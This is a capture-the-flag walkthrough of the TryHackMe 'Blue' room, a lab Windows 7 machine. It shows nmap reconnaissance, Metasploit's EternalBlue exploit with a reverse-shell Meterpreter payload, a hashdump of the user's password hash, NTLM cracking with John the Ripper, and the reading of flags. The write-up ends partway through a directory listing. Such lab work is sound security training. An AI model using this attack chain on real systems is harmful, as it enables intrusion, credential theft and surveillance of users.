Press enter or click to view image in full size
Room link [TryHackMe]
Reconnaissance
The first phase of Hacking involves in gathering information about a target to identify the potential technologies used by the target, which could lead an attacker to find the lope holes in the target (vulnerabilities/ misconfigurations).
Following the plan in step by step approach leads to successful exploit.
Nmap Scan on the Target
nmap -sC -sV -v3 -p- -Pn -oN nmap-scan.txt <ip>-sC: Default script command-sV: Version scan-v3: Verbosity refers to the level of detail shown in the output during a scan.-p-: To scan all the ports of a target.-Pn: Used to skip host discovery and treat all specified hosts as "online" without attempting to ping them first.-oN: To get the output into a file--script vuln: Runs vulnerability detection scripts from the Nmap Scripting Engine (NSE). It automates the detection of common vulnerabilities and provides detailed information about potential issues on the target system(s).
Found Some ports
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server? syn-ack
| ssl-cert: Subject: commonName=Jon-PC
| Issuer: commonName=Jon-PC
| Public Key type: rsa
| Public Key bits: 2048
49152/tcp open msrpc syn-ack Microsoft Windows RPC
49153/tcp open msrpc syn-ack Microsoft Windows RPC
49154/tcp open msrpc syn-ack Microsoft Windows RPC
49158/tcp open msrpc syn-ack Microsoft Windows RPC
49160/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows- Found a vulnerability
ms17-010which iseternal blue - Every vulnerability has its own story. When someone discovers a zero-day vulnerability, there are often multiple reasons behind how and why they found it. Some may stumble upon it through rigorous research, while others might uncover it by accident. But what truly matters is understanding the vulnerability before attempting to exploit it.
- Taking the time to study a vulnerability can reveal fascinating histories, some even as impactful as EternalBlue, which played a critical role in global cyberattacks. By delving deeper, you not only enhance your ability to exploit or mitigate it effectively but also gain insights into the broader implications of cybersecurity threats.
- Check out the fascinating story behind the EternalBlue [wiki]
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| <https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>
| <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>
|_ <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIEDTo gain access we can use Metasploit
Foothold
msfconsole to start the metasploit
┌─[TheFlyingWolf]─[~/tryhackme/blue]
└──╼ $msfconsole
Metasploit tip: The use command supports fuzzy searching to try and
select the intended module, e.g. use kerberos/get_ticket or use
kerberos forge silver ticket ___ ____
,-"" `. < HONK >
,' _ e )`-._ / ----
/ ,' `-._<.===-'
/ /
/ ;
_ / ;
(`._ _.-"" ""--..__,' |
<_ `-"" \
<`- :
(__ <__. ;
`-. '-.__. _.' /
\ `-.__,-' _,'
`._ , /__,-'
""._\__,'< <____
| | `----.`.
| | \ `.
; |___ \-``
\ --<
`.`.<
`-'
=[ metasploit v6.4.43-dev ]
+ -- --=[ 2484 exploits - 1279 auxiliary - 431 post ]
+ -- --=[ 1463 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
[msf](Jobs:0 Agents:0) >>
search for the exploit ms17-010
[msf](Jobs:0 Agents:0) >> search ms17-010Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 \_ target: Automatic Target . . . .
2 \_ target: Windows 7 . . . .
3 \_ target: Windows Embedded Standard 7 . . . .
4 \_ target: Windows Server 2008 R2 . . . .
5 \_ target: Windows 8 . . . .
6 \_ target: Windows 8.1 . . . .
7 \_ target: Windows Server 2012 . . . .
8 \_ target: Windows 10 Pro . . . .
9 \_ target: Windows 10 Enterprise Evaluation . . . .
10 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
11 \_ target: Automatic . . . .
12 \_ target: PowerShell . . . .
13 \_ target: Native upload . . . .
14 \_ target: MOF upload . . . .
15 \_ AKA: ETERNALSYNERGY . . . .
16 \_ AKA: ETERNALROMANCE . . . .
17 \_ AKA: ETERNALCHAMPION . . . .
18 \_ AKA: ETERNALBLUE . . . .
19 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
20 \_ AKA: ETERNALSYNERGY . . . .
21 \_ AKA: ETERNALROMANCE . . . .
22 \_ AKA: ETERNALCHAMPION . . . .
23 \_ AKA: ETERNALBLUE . . . .
24 auxiliary/scanner/smb/smb_ms17_010 . normal No MS17-010 SMB RCE Detection
25 \_ AKA: DOUBLEPULSAR . . . .
26 \_ AKA: ETERNALBLUE . . . .
27 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
28 \_ target: Execute payload (x64) . . . .
29 \_ target: Neutralize implant . . . .
Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'
To use the exploit Follow the command
[msf](Jobs:0 Agents:0) >> use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcpoptions to check the requirements.
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> optionsModule options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mac
hines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machine
s.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.x.x.x yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >>
set rhosts <target-ip> to set traget ip
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set rhosts <target-ip>
rhosts => <target-ip>- Optional Parameter
Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:
set payload windows/x64/shell/reverse_tcpset lhost <Attacker-ip>to set Attacker IP
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set lhost <attacker-ip>
lhost => <attacker-ip>Use "check” verifying the target vulnerability
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> check
[*] 10.x.x.x:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.x.x.x:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.x.x.x:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.x.x.x:445 - The target is vulnerable.- Yes, the target is vulnerable
exploit to run the exploit
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> exploit
[*] Started reverse TCP handler on 10.x.x.x:4444
[*] 10.x.x.x:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.x.x.x:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.x.x.x:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.x.x.x:445 - The target is vulnerable.
[*] 10.x.x.x:445 - Connecting to target for exploitation.
[+] 10.x.x.x:445 - Connection established for exploitation.
[+] 10.x.x.x:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.x.x.x:445 - CORE raw buffer dump (42 bytes)
[*] 10.x.x.x:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.x.x.x:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.x.x.x:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.x.x.x:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.x.x.x:445 - Trying exploit with 12 Groom Allocations.
[*] 10.x.x.x:445 - Sending all but last fragment of exploit packet
[*] 10.x.x.x:445 - Starting non-paged pool grooming
[+] 10.x.x.x:445 - Sending SMBv2 buffers
[+] 10.x.x.x:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.x.x.x:445 - Sending final SMBv2 buffers.
[*] 10.x.x.x:445 - Sending last fragment of exploit packet!
[*] 10.x.x.x:445 - Receiving response from exploit packet
[+] 10.x.x.x:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.x.x.x:445 - Sending egg to corrupted connection.
[*] 10.x.x.x:445 - Triggering free of corrupted buffer.
[*] Sending stage (203846 bytes) to 10.x.x.x
[*] Meterpreter session 1 opened (10.x.x.x:4444 -> 10.x.x.x:49177) at 2025-01-25 13:53:56 +0530
[+] 10.x.x.x:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.x.x.x:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.x.x.x:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=(Meterpreter 1)(C:\Windows\system32) >
- upgrading shell to meterpreter shell
- press
ctrl + z&y - The command don’t terminate session
(Meterpreter 1)(C:\\Windows\\system32) >
Background session 1? [y/N]
[msf](Jobs:0 Agents:1) exploit(windows/smb/ms17_010_eternalblue) >>[msf](Jobs:0 Agents:1) exploit(windows/smb/ms17_010_eternalblue) >> search shell_to_meterpreterMatching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/manage/shell_to_meterpreter . normal No Shell to Meterpreter Upgrade
Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/shell_to_meterpreter
[msf](Jobs:0 Agents:1) exploit(windows/smb/ms17_010_eternalblue) >> use post/multi/manage/shell_to_meterpreter
[msf](Jobs:0 Agents:1) post(multi/manage/shell_to_meterpreter) >>[msf](Jobs:0 Agents:1) post(multi/manage/shell_to_meterpreter) >> sessions -lActive sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.x.x.x:4444 -> 10.x.x.x:49177 (10.x.x.x)
[msf](Jobs:0 Agents:1) post(multi/manage/shell_to_meterpreter) >>
[msf](Jobs:0 Agents:1) post(multi/manage/shell_to_meterpreter) >> optionsModule options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION yes The session to run this module on
View the full module info with the info, or info -d command.
[msf](Jobs:0 Agents:1) post(multi/manage/shell_to_meterpreter) >>
[msf](Jobs:0 Agents:1) post(multi/manage/shell_to_meterpreter) >> set session 1
session => 1[msf](Jobs:0 Agents:1) post(multi/manage/shell_to_meterpreter) >> optionsModule options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION 1 yes The session to run this module on
View the full module info with the info, or info -d command.
[msf](Jobs:0 Agents:1) post(multi/manage/shell_to_meterpreter) >>
[msf](Jobs:0 Agents:1) post(multi/manage/shell_to_meterpreter) >> run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.x.x.x:4433
[*] Post module execution completed
[msf](Jobs:1 Agents:1) post(multi/manage/shell_to_meterpreter) >>
[*] Sending stage (203846 bytes) to 10.x.x.x
[*] Meterpreter session 2 opened (10.x.x.x:4433 -> 10.x.x.x:49195) at 2025-01-25 14:02:07 +0530
[*] Stopping exploit/multi/handler
Interrupt: use the 'exit' command to quit
[msf](Jobs:0 Agents:2) post(multi/manage/shell_to_meterpreter) >>[msf](Jobs:0 Agents:2) post(multi/manage/shell_to_meterpreter) >> sessions -lActive sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.x.x.x:4444 -> 10.x.x.x:49177 (10.x.x.x)
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.x.x.x:4433 -> 10.x.x.x:49195 (10.x.x.x)
[msf](Jobs:0 Agents:2) post(multi/manage/shell_to_meterpreter) >> sessions -i 2
[*] Starting interaction with 2...
(Meterpreter 2)(C:\Windows\system32) >
Learning about Meterpreter shell commands
(Meterpreter 2)(C:\) > helpCore Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
pivot Manage pivot listeners
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session
ssl_verify Modify the SSL certificate verification setting
transport Manage the transport mechanisms
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory (alias for lpwd)
getwd Print working directory
lcat Read the contents of a local file to the screen
lcd Change local working directory
ldir List local files (alias for lls)
lls List local files
lmkdir Create new directory on local machine
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyboard_send Send keystrokes
keyevent Send key events
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
mouse Send mouse events
screenshare Watch the remote user desktop in real time
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
For more info on a specific command, use <command> -h or help <command>.
(Meterpreter 2)(C:\) >
Searching all text file’s
search -h(Meterpreter 2)(C:\) > search -h
Usage: search [-d dir] [-r recurse] -f pattern [-f pattern]...
Search for files.OPTIONS:
-a Find files modified after timestamp (UTC). Format: YYYY-mm-dd or YYYY-mm-ddTHH:MM:SS
-b Find files modified before timestamp (UTC). Format: YYYY-mm-dd or YYYY-mm-ddTHH:MM:SS
-d The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
-f A file pattern glob to search for. (e.g. *secret*.doc?)
-h Help Banner
-r Recursively search sub directories. (Default: true)
- listing all the files paths to find flags
search -f *.txt(Meterpreter 2)(C:\) > search -f *.txt
Found 432 results...
====================Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceAmharic.txt 16212 2009-06-11 03:13:18 +0530
.
.
c:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceYi.txt 44968 2009-06-11 03:13:19 +0530
c:\Program Files\Amazon\Ec2ConfigService\Docs\Attribution.txt 22520 2015-03-27 19:03:58 +0530
.
. 624 2015-03-27 19:04:10 +0530
.
.
. 0 2018-12-13 08:44:01 +0530
c:\Users\Jon\Documents\flag3.txt 37 2019-03-18 00:56:36 +0530
.
.
.
.
. 128975 2019-03-18 03:55:45 +0530
c:\Windows\System32\config\flag2.txt 34 2019-03-18 01:02:48 +0530
.
.
.
.
c:\flag1.txt 24 2019-03-18 00:57:21 +0530
(Meterpreter 2)(C:\) >
(Meterpreter 2)(C:\Windows\system32) > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::Understand the Format
A typical hash dump format looks like this:
<username>:<user_id>:<LM_hash>:<NT_hash>:::<username>: User account nameJon<user_id>: Security Identifier (SID) associated with the user1000<LM_hash>: LM hash (rarely used anymore, often justaad3b435b51404eeaad3b435b51404ee).<NT_hash>: The NTLM hash of the user's password
Validate the NT Hash
Ensure they are in a valid format:
- Each NT hash is a 32-character hexadecimal string.
- Example:
ffb43f0de35be4d9917ac0cc8ad57f8d
Crack the NT Hashes
You can now use the extracted NT hashes for further testing or cracking:
Using Hashcat:
- Save the NT hashes to a file (
nt_hashes.txt). - Use hashcat with mode
1000(NTLM):
hashcat -m 1000 -a 0 nt_hashes.txt wordlist.txtUsing John the Ripper:
- Convert the hashes to a format John can understand if needed.
- After running John got an
errorwith thehash type
┌─[TheFlyingWolf]─[~/tryhackme/blue]
└──╼ $ls
jon-hash nmap-scan nmap-scan-below-1000-ports nt-jon-hash
┌─[TheFlyingWolf]─[~/tryhackme/blue]
└──╼ $cat nt-jon-hash
Jon:ffb43f0de35be4d9917ac0cc8ad57f8d
┌─[TheFlyingWolf]─[~/tryhackme/blue]
└──╼ $john --wordlist=/usr/share/wordlists/rockyou.txt nt-jon-hash
Warning: detected hash type "LM", but the string is also recognized as "dynamic=md5($p)"
Use the "--format=dynamic=md5($p)" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "HAVAL-128-4"
Use the "--format=HAVAL-128-4" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "MD2"
Use the "--format=MD2" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "mdc2"
Use the "--format=mdc2" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "mscash"
Use the "--format=mscash" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "mscash2"
Use the "--format=mscash2" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "NT"
Use the "--format=NT" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "Raw-MD4"
Use the "--format=Raw-MD4" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "Raw-MD5"
Use the "--format=Raw-MD5" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "Raw-MD5u"
Use the "--format=Raw-MD5u" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "ripemd-128"
Use the "--format=ripemd-128" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "Snefru-128"
Use the "--format=Snefru-128" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "ZipMonster"
Use the "--format=ZipMonster" option to force loading these as that type instead
Using default input encoding: UTF-8
Using default target encoding: CP850
Loaded 2 password hashes with no different salts (LM [DES 256/256 AVX2])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2025-01-25 14:47) 0g/s 7192Kp/s 7192Kc/s 14385KC/s !!1QWER..*7¡VA
Session completed.- So specified the format of the hash
—format=nt
john --wordlist=/usr/share/wordlists/rockyou.txt nt-jon-hash --format=nt- Output
┌─[TheFlyingWolf]─[~/tryhackme/blue]
└──╼ $john --wordlist=/usr/share/wordlists/rockyou.txt nt-jon-hash --format=nt
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
alqfna22 (Jon)
1g 0:00:00:00 DONE (2025-01-25 14:48) 1.754g/s 17895Kp/s 17895Kc/s 17895KC/s alr19882006..alpusidi
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.Found Credentials Jon : alqfna22
Flag 1
(Meterpreter 2)(C:\Windows\system32) > cd /
(Meterpreter 2)(C:\) > ls
Listing: C:\
============Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2018-12-13 08:43:36 +0530 $Recycle.Bin
040777/rwxrwxrwx 0 dir 2009-07-14 10:38:56 +0530 Documents and Settings
040777/rwxrwxrwx 0 dir 2009-07-14 08:50:08 +0530 PerfLogs
040555/r-xr-xr-x 4096 dir 2019-03-18 03:52:01 +0530 Program Files
040555/r-xr-xr-x 4096 dir 2019-03-18 03:58:38 +0530 Program Files (x86)
040777/rwxrwxrwx 4096 dir 2019-03-18 04:05:57 +0530 ProgramData
040777/rwxrwxrwx 0 dir 2018-12-13 08:43:22 +0530 Recovery
040777/rwxrwxrwx 4096 dir 2019-03-18 04:05:55 +0530 System Volume Information
040555/r-xr-xr-x 4096 dir 2018-12-13 08:43:28 +0530 Users
040777/rwxrwxrwx 16384 dir 2019-03-18 04:06:30 +0530 Windows
100666/rw-rw-rw- 24 fil 2019-03-18 00:57:21 +0530 flag1.txt
000000/--------- 0 fif 1970-01-01 05:30:00 +0530 hiberfil.sys
000000/--------- 0 fif 1970-01-01 05:30:00 +0530 pagefile.sys
(Meterpreter 2)(C:\) > cat flag1.txt
flag{access_the_machine}
- Flag1 :
flag{access_the_machine}
Flag 2
(Meterpreter 2)(C:\\) > cd Windows\\\\System32\\\\config\\\\
(Meterpreter 2)(C:\\Windows\\System32\\config) > ls
Listing: C:\\Windows\\System32\\config
===================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 28672 fil 2018-12-13 04:30:40 +0530 BCD-Template
100666/rw-rw-rw- 25600 fil 2018-12-13 04:30:40 +0530 BCD-Template.LOG
100666/rw-rw-rw- 18087936 fil 2025-01-25 14:03:28 +0530 COMPONENTS
100666/rw-rw-rw- 1024 fil 2011-04-12 14:02:10 +0530 COMPONENTS.LOG
100666/rw-rw-rw- 13312 fil 2025-01-25 14:03:28 +0530 COMPONENTS.LOG1
100666/rw-rw-rw- 0 fil 2009-07-14 08:04:08 +0530 COMPONENTS.LOG2
100666/rw-rw-rw- 1048576 fil 2025-01-25 13:53:58 +0530 COMPONENTS{016888b8-6c6f-11de-8d1d-001e0bcde3ec}.TxR.0.regtrans-ms
100666/rw-rw-rw- 1048576 fil 2025-01-25 13:53:58 +0530 COMPONENTS{016888b8-6c6f-11de-8d1d-001e0bcde3ec}.TxR.1.regtrans-ms
100666/rw-rw-rw- 1048576 fil 2025-01-25 13:53:58 +0530 COMPONENTS{016888b8-6c6f-11de-8d1d-001e0bcde3ec}.TxR.2.regtrans-ms
100666/rw-rw-rw- 65536 fil 2025-01-25 13:53:58 +0530 COMPONENTS{016888b8-6c6f-11de-8d1d-001e0bcde3ec}.TxR.blf
100666/rw-rw-rw- 65536 fil 2018-12-13 08:50:57 +0530 COMPONENTS{016888b9-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw- 524288 fil 2018-12-13 08:50:57 +0530 COMPONENTS{016888b9-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2009-07-14 10:31:27 +0530 COMPONENTS{016888b9-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
100666/rw-rw-rw- 262144 fil 2025-01-25 14:03:08 +0530 DEFAULT
100666/rw-rw-rw- 1024 fil 2011-04-12 14:02:10 +0530 DEFAULT.LOG
100666/rw-rw-rw- 177152 fil 2025-01-25 14:03:08 +0530 DEFAULT.LOG1
100666/rw-rw-rw- 0 fil 2009-07-14 08:04:08 +0530 DEFAULT.LOG2
100666/rw-rw-rw- 65536 fil 2019-03-18 03:52:17 +0530 DEFAULT{016888b5-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw- 524288 fil 2019-03-18 03:52:17 +0530 DEFAULT{016888b5-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2019-03-18 03:52:17 +0530 DEFAULT{016888b5-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
040777/rwxrwxrwx 0 dir 2009-07-14 08:04:57 +0530 Journal
040777/rwxrwxrwx 4096 dir 2019-03-18 01:26:54 +0530 RegBack
100666/rw-rw-rw- 262144 fil 2019-03-18 01:35:08 +0530 SAM
100666/rw-rw-rw- 1024 fil 2011-04-12 14:02:10 +0530 SAM.LOG
100666/rw-rw-rw- 21504 fil 2019-03-18 04:09:12 +0530 SAM.LOG1
100666/rw-rw-rw- 0 fil 2009-07-14 08:04:08 +0530 SAM.LOG2
100666/rw-rw-rw- 65536 fil 2019-03-18 03:52:17 +0530 SAM{016888c1-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw- 524288 fil 2019-03-18 03:52:17 +0530 SAM{016888c1-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2019-03-18 03:52:17 +0530 SAM{016888c1-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
100666/rw-rw-rw- 262144 fil 2025-01-25 14:03:13 +0530 SECURITY
100666/rw-rw-rw- 1024 fil 2011-04-12 14:02:10 +0530 SECURITY.LOG
100666/rw-rw-rw- 21504 fil 2025-01-25 14:03:13 +0530 SECURITY.LOG1
100666/rw-rw-rw- 0 fil 2009-07-14 08:04:08 +0530 SECURITY.LOG2
100666/rw-rw-rw- 65536 fil 2019-03-18 03:52:17 +0530 SECURITY{016888c5-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw- 524288 fil 2019-03-18 03:52:17 +0530 SECURITY{016888c5-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
